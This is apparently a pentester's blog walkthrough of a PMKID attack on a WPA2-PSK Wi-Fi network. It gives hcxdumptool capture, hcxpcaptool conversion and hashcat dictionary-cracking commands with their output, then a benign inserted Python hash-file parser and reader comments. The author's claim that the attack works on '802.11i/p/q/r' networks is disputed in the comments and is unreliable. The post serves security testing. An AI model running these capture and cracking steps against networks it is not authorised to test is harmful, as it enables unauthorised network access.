
PMKID Attack Using Hcxdumptool and Hashcat

While the technique is a bit older, I recently pulled off a PMKID attack and wanted to share the steps.

PMKID Attack – Introduction

If you’ve never heard of the PMKID attack, then I recommend reading the original hashcat post.

This is a client-less attack that doesn’t need a 4-way handshake or special output format.

For another walkthrough, you can also visit the following post.

YouTube Version of this Post

If you prefer a video over reading the text, then you can find the YouTube version of this post below.

Targeting the Network

First, you will need to use hcxdumptool to capture the WLAN traffic. Note that not all drivers work out of the box, but the following chipsets are recommended.

  • USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter
  • USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter
  • USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
  • USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
  • USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Note that I performed this attack with a different card; if you do the same, expect some additional driver setup.

PMKID - Alfa AC1200

root@kali:~# lsusb
Bus 004 Device 003: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter

With my Alfa card in monitor mode, I was ready to begin.

root@kali:~# iwconfig
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=30 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
          
lo        no wireless extensions.

eth0      no wireless extensions.

First, I used airodump-ng to grab the BSSID of my target network.

 CH  6 ][ Elapsed: 48 s ][ 2019-02-26 13:00                                         
                                                                                                          
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                       
                                                                                                          
 18:31:xx:xx:xx:xx  -67  17      266        0    0   6  130  WPA2 CCMP   PSK  TARGETNETWORK   

Once I obtained the BSSID, I added it to a filter file. While more than one BSSID can exist in this file, I was only targeting this specific network.

root@kali:~# echo "18xxxxxxxxxx" > myfilter.txt

Performing the Attack

With my filter in place, I could now use hcxdumptool to collect packets.

I was able to capture a PMKID hash very quickly, which was awesome!

root@kali:~# hcxdumptool -o capture.pcap -i wlan0 --enable_status=1 --filterlist=myfilter.txt --filtermode=2
initialization...

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
ERRORMAX.................: 100 errors
FILTERLIST...............: 1 entries
MAC CLIENT...............: dc701431xxxx
MAC ACCESS POINT.........: 48f317b472b8 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 65198
ANONCE...................: 7281156220ed9e68c9f974df2f98d10b7c800270b49e1004ad5dc1ad3e2662b0

[13:07:58 - 006] 1831xxxxxxxx -> a04ea7a4xxxx [FOUND PMKID]

Next, I used hcxpcaptool to convert the capture into hashcat's PMKID hash format.

root@kali:~# hcxpcaptool -z pmkid_hash.txt capture.pcap 

reading from capture.pcap
                                                
summary:                                        
--------
file name....................: capture.pcap
file type....................: pcapng 1.0
file hardware information....: i686
file os information..........: Linux 4.19.0-kali1-686-pae
file application information.: hcxdumptool 5.1.3
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 88
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 88
beacons (with ESSID inside)..: 9
probe requests...............: 14
probe responses..............: 11
association requests.........: 7
association responses........: 7
authentications (OPEN SYSTEM): 38
authentications (BROADCOM)...: 22
authentications (APPLE)......: 4
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to pmkid_hash.txt
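Before feeding a converted file to hashcat it is worth checking what hcxpcaptool actually wrote. The following is an added example, not code from this post or from the hcx tools, that parses the hashcat mode 16800 line format produced by `hcxpcaptool -z` (PMKID, AP MAC, client MAC and hex-encoded ESSID, separated by `*`), validates each field, decodes the ESSID, and lists the networks the file contains so you can confirm that only the BSSID from your filter list ended up in the file. The sample file content below is constructed, not a real capture.

```python
"""Parse and sanity-check hashcat mode 16800 (WPA-PMKID-PBKDF2) hash lines.

Line format written by hcxpcaptool -z:  PMKID*MAC_AP*MAC_STA*ESSID_HEX
All fields are hex; the ESSID field is the raw SSID bytes hex-encoded.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample file content: two well-formed lines for the same AP
# (two different client MACs) and one malformed line.
SAMPLE_HASH_FILE = """\
f4f0a1b2c3d4e5f60718293a4b5c6d7e*18310a0b0c0d*a04ea7a40102*5441524745544e4554574f524b
f4f0a1b2c3d4e5f60718293a4b5c6d7e*18310a0b0c0d*dc7014310203*5441524745544e4554574f524b
not*a*valid*line
"""

# 32 hex chars (16-byte PMKID), 12 hex chars per MAC, then the hex ESSID.
_LINE_RE = re.compile(
    r"^([0-9a-f]{32})\*([0-9a-f]{12})\*([0-9a-f]{12})\*([0-9a-f]*)$"
)


@dataclass(frozen=True)
class PmkidHash:
    pmkid: str     # 16-byte PMKID as hex
    bssid: str     # access point MAC, colon-separated
    station: str   # client MAC, colon-separated
    essid: str     # network name, decoded from hex


def _colon_mac(hex12: str) -> str:
    """Turn '18310a0b0c0d' into '18:31:0a:0b:0c:0d'."""
    return ":".join(hex12[i:i + 2] for i in range(0, 12, 2))


def parse_line(line: str) -> PmkidHash:
    """Parse one 16800 hash line; raise ValueError if it is malformed."""
    line = line.strip().lower()
    m = _LINE_RE.match(line)
    if not m:
        raise ValueError(f"malformed 16800 hash line: {line!r}")
    pmkid, ap, sta, essid_hex = m.groups()
    essid_len = len(essid_hex) // 2
    # An SSID is 1..32 bytes, so the hex field must be an even length in that range.
    if len(essid_hex) % 2 or not 1 <= essid_len <= 32:
        raise ValueError(f"bad ESSID length in line: {line!r}")
    essid = bytes.fromhex(essid_hex).decode("utf-8", errors="replace")
    return PmkidHash(pmkid=pmkid, bssid=_colon_mac(ap),
                     station=_colon_mac(sta), essid=essid)


def parse_file(text: str) -> Tuple[List[PmkidHash], List[str]]:
    """Parse every non-empty line; return (parsed hashes, malformed lines)."""
    hashes: List[PmkidHash] = []
    bad: List[str] = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        try:
            hashes.append(parse_line(raw))
        except ValueError:
            bad.append(raw)
    return hashes, bad


def unique_networks(hashes: List[PmkidHash]) -> List[Tuple[str, str]]:
    """Sorted (BSSID, ESSID) pairs present in the file, for scope checking."""
    return sorted({(h.bssid, h.essid) for h in hashes})


if __name__ == "__main__":
    parsed, malformed = parse_file(SAMPLE_HASH_FILE)
    for bssid, essid in unique_networks(parsed):
        print(f"{bssid}  {essid}")
    if malformed:
        print(f"{len(malformed)} malformed line(s) skipped")
```

Running this over the sample prints the single (BSSID, ESSID) pair and reports the malformed line; on a real file, any BSSID that is not in your filter list is a sign the capture scope was wider than intended.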

Cracking the Hash

To crack these hashes using hashcat, you will need at least version 4.2.0.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat --version
v4.2.1

After verifying that I had an updated version, I started to crack the hash.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -r ~/tools/cracking/best64.rule pmkid_hash.txt ~/tools/cracking/rockyou.txt
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104517568
* Runtime...: 1 sec

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: f4fxxxxxxxxxxxxxxxxxxxxxxxxxxxxx*1831xxxxxxxx*axxxx...6xxxxx
Time.Started.....: Tue Feb 26 14:17:20 2019 (28 secs)
Time.Estimated...: Tue Feb 26 18:57:06 2019 (4 hours, 39 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5477 H/s (7.38ms) @ Accel:8 Loops:4 Thr:256 Vec:1
Speed.Dev.#3.....:    59229 H/s (8.04ms) @ Accel:32 Loops:16 Thr:256 Vec:1
Speed.Dev.#*.....:    64706 H/s
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 20165670/1104517568 (1.83%)
Rejected.........: 18445350/20165670 (91.47%)
Restore.Point....: 0/14344384 (0.00%)
Candidates.#2....: 123456789 -> Iloveyou85
Candidates.#3....: iloveyou348 -> footiecrazy8

Unfortunately, I was unable to crack the hash in this specific scenario. That said, I was able to prove the vulnerability and convince them to switch away from PSK.

In lieu of a fun screenshot of me connecting, I give you a picture of my co-worker’s awesome Tupavco TP511 WiFi panel antenna.

PMKID - 20dBi Antenna

I also wanted to point out that cracking PMKID hashes is around twice as fast as cracking standard EAPOL (4-way handshake) hashes, as the benchmarks below show! This makes the attack even more enticing, as the PBKDF2 key derivation behind WPA2-PSK is notoriously slow.

Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 16800 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 16800 - WPA-PMKID-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6631 H/s (53.86ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    59876 H/s (66.06ms) @ Accel:128 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    66507 H/s

Started: Thu Feb 28 16:05:21 2019
Stopped: Thu Feb 28 16:05:31 2019
Rays-MacBook-Pro-2:Wireless doyler$ hashcat -d2,3 -m 2500 -b
hashcat (v4.2.1) starting in benchmark mode...

Benchmarking uses hand-optimized kernel code by default.
You can use it in your cracking session by setting the -O option.
Note: Using optimized kernel code limits the maximum supported password length.
To disable the optimized kernel code in benchmark mode, use the -w option.

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Benchmark relevant options:
===========================
* --opencl-devices=2,3
* --optimized-kernel-enable

Hashmode: 2500 - WPA-EAPOL-PBKDF2 (Iterations: 4096)

Speed.Dev.#2.....:     6634 H/s (53.85ms) @ Accel:32 Loops:8 Thr:256 Vec:1
Speed.Dev.#3.....:    26169 H/s (75.92ms) @ Accel:64 Loops:32 Thr:256 Vec:1
Speed.Dev.#*.....:    32803 H/s

Started: Thu Feb 28 16:05:36 2019
Stopped: Thu Feb 28 16:05:44 2019

PMKID Attack – Conclusion

While I wasn’t able to perform a complete compromise, this was still an awesome attack to pull off. I definitely plan on using it, and researching it, further.

Note that EAPHammer can also do this attack, and I may share a post with that technique as well.

If you have any other suggestions for wireless gear or techniques that I should try, then please reach out!

12 Comments

  1. Ray – Seemoo labs recently released firmware patching project for Broadcom wireless chipsets (most notably the ones in the R-Pi3B) that enables monitor mode and frame injection. I just pulled this off on one of my R-pi’s and it works beautifully! Next step will be to apply this to a Pi-Zero. Being able to run wireless pentest without the external card is a huge advantage for me; thought you may be interested. Here’s their github link.
    https://github.com/seemoo-lab/nexmon

    • Woah, this is awesome! I carry a Pi3B or a Pi0W around as my primary kit now, but have been utilizing an external card. Being able to make the form factor even smaller is definitely intriguing.

      I still have to finish some write-ups, but I’ve been using the Panda cards and a 3d printed case most recently, to hold the 10k Ankers.

  2. Hey, I found your guide and just seeing If you can help me figure out what I might be doing wrong.(because I can never get this to fully work.) I use an Alfa AWUS036H which works great for its age. I put my card into ‘monitor mode’ which goes from wlan0 to wlan0mon.

    Once I get to this point: ‘hcxdumptool -o capture.pcap -i wlanO --enable_status=1 --filterlist=myfilter.txt --filtermode=2’, is the ‘wlanO’ an upper case O or the number zero?

    Also, did you put the wifi back out of monitor mode before you run that?

    I have to run it on my side with “hcxdumptool -o capture.pcap -i wlan0mon --enable_status=1 --filterlist=myfilter.txt --filtermode=2”.
    Then I get hit with this error: “Warning: wlan0mon is probably a monitor interface”

    Using ‘wlan0 or wlanO’ will not work. I have tried to run it many different ways, with different guides and I have no clue what I’m doing wrong. I’m running hcxdumptool version 5.1.4 too. Appreciate any help. thanks

    • The -i flag is for interface, so you will want to use wlan0 (zero), or whatever your interface is currently set.

      Additionally, you do not want to be in monitor mode for this attack, so you’d use wlan0 and managed mode. wlan0 will not work if the interface is currently called wlan0mon (even if it is not in monitor mode).

  3. I’m guessing you didn’t want to help, seeing that my question was never posted.(which is OK). More testing on an old router pulled the pmkid without errors….mostly. Maybe Kali doesn’t like my alfa wireless card..not enough power?? Who the hell knows. They don’t make it clear on how the switching of networks go as far as monitor mode and what not. Guess it’s time for a new wireless card. If anything thanks for the guide. Delete this post if you like.

    • Haha, I have to manually approve posts to prevent spam, and you only posted it last night.

      The AWUS036H should work fine, but it definitely has a high power consumption. What do you mean as far as switching of networks and monitor mode is concerned though?

      • Sorry! It just appeared on my side that the messages were deleted. The switching of networks, I think you answered with the other reply to my message. I was just confused on if I manually needed to switch out of monitor mode or not, for certain parts of this attack.

        From reading it over again, It appears you set the wifi card into monitor mode for the Airodump-ng session (to find the network) then set it back to managed mode afterwards (back to wlan0), to run the hcxdumptool command with wlan0. (I hope I got that right haha) I think it finally makes sense now though.

        I think I might be a little to far to grab the pmkid from certain routers, or maybe the router just doesn’t accept that type of attack. Thank you

        • Yea, you want to not be in monitor mode when attempting the attack.

          The router might not be vulnerable to the attack. This will work against all 802.11i/p/q/r networks with roaming functions enabled. If your router doesn’t support that, then you will not be able to successfully grab the PMKID hash.

  4. Pretty sure 802.11q is not a thing. In the post you linked (page 3 or so of comments) ZerBea mentions this was added just to see who copies and pastes information lulz
